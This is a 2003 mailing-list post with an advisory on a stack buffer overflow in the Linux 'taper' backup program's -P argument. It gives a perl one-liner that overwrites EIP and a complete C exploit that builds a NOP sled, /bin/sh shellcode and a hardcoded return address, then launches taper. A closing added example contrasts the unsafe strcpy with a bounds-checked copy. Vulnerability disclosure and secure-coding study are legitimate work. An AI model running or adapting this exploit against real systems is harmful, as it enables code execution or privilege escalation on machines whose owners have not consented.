Hi,

There is a stack overflow vulnerability in the taper program of Linux 7.3 (maybe others). On Linux 7.3 it's not suid by default, but I don't know about other distros/versions; maybe it's suid on others.

Advisory:
------------------------------------------------------------------------------------------------------------------------------
gEEkz-advisory
NrAziz (c) 2003
nraziz_at_geekz_nl
polygrithm_at_hotmail
http://geekz.nl

--{0x01 Introduction:

Taper is a user-friendly archive program especially designed for backing up to tape drives. It also supports backing up to files on a hard disk.

--{0x02 Vulnerability:

taper has a vulnerability in its argument to -P. By giving a large string it overwrites the eip, e.g.

  taper `perl -e 'print "A" x 2708'`

overwrites the eip. It may have other possible vulnerabilities because of the usage of many strcpy's. Taper by default is non-suid on Linux 7.3; however, if it's suid on any other distro/version please let me know.

--{0x03 Greetz:

To gEEkz team, rave, gorny, and other m8s
------------------------------------------------------------------------------------------------------------------------------

Exploit:
------------------------------------------------------------------------------------------------------------------------------
/* gEEkz-taper-xploit */
/*
 * Copyright(C) 2003 NrAziz
 * nraziz^at^geekz^nl
 */
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>     /* execl */
#include <sys/types.h>  /* u_long */

/* /bin/sh */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80\xb0\x01\x31\xdb\xcd\x80";

#define B_SIZE 2708

int main(int argc,char **argv)
{
    char buffer[B_SIZE+1];   /* one extra byte for the terminating NUL */
    int i;
    u_long ret=0xbffff250;

    /* fill with 0x90, then place ret (little-endian) in the last 4 bytes */
    memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);
    buffer[B_SIZE-4]=(ret & 0x000000ff);
    buffer[B_SIZE-3]=(ret & 0x0000ff00)>>8;
    buffer[B_SIZE-2]=(ret & 0x00ff0000)>>16;
    buffer[B_SIZE-1]=(ret & 0xff000000)>>24;
    buffer[B_SIZE]=0;
    memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));
    execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);
    return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------

Regards,
NrAziz
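As an added example that is not part of the advisory or of taper's own code, here is the unchecked argument copy the advisory describes (a strcpy of the -P value into a fixed-size buffer) beside a bounds-checked version that refuses oversized input. PATH_BUF, its 256-byte size and the function names are assumptions for illustration; taper's real buffer size is not given on the page.

```c
#include <stdio.h>
#include <string.h>
#define PATH_BUF 256   /* assumed size for illustration; not taper's real buffer size */

/* The unchecked pattern the advisory describes: an argv-derived string copied
   with strcpy into a fixed-size buffer, so any argument of PATH_BUF bytes or
   more writes past the end of dest. Kept here for contrast only. */
void set_path_unchecked(char dest[PATH_BUF], const char *arg)
{
    strcpy(dest, arg);
}

/* Hardened replacement: look for the terminator within PATH_BUF bytes and
   refuse anything that does not fit, leaving dest untouched on failure.
   Returns 0 on success, -1 if the argument is too long. */
int set_path_checked(char dest[PATH_BUF], const char *arg)
{
    const char *nul = memchr(arg, '\0', PATH_BUF);
    if (nul == NULL) {
        return -1;                       /* no NUL within PATH_BUF: too long */
    }
    memcpy(dest, arg, (size_t)(nul - arg) + 1);  /* copies the NUL as well */
    return 0;
}

/* Builds a constructed argument of n 'A' bytes (like the advisory's perl
   one-liner) and reports whether the checked handler accepts it:
   1 = accepted, 0 = rejected. */
int arg_of_length_accepted(size_t n)
{
    static char arg[4096];
    char dest[PATH_BUF];
    if (n >= sizeof arg) {
        return 0;
    }
    memset(arg, 'A', n);
    arg[n] = '\0';
    return set_path_checked(dest, arg) == 0;
}

int main(int argc, char **argv)
{
    char path[PATH_BUF];
    const char *arg = argc > 1 ? argv[1] : "/dev/nst0";   /* constructed default */
    if (set_path_checked(path, arg) != 0) {
        fprintf(stderr, "-P argument too long (max %d bytes)\n", PATH_BUF - 1);
        return 1;
    }
    printf("using device %s\n", path);
    return 0;
}
```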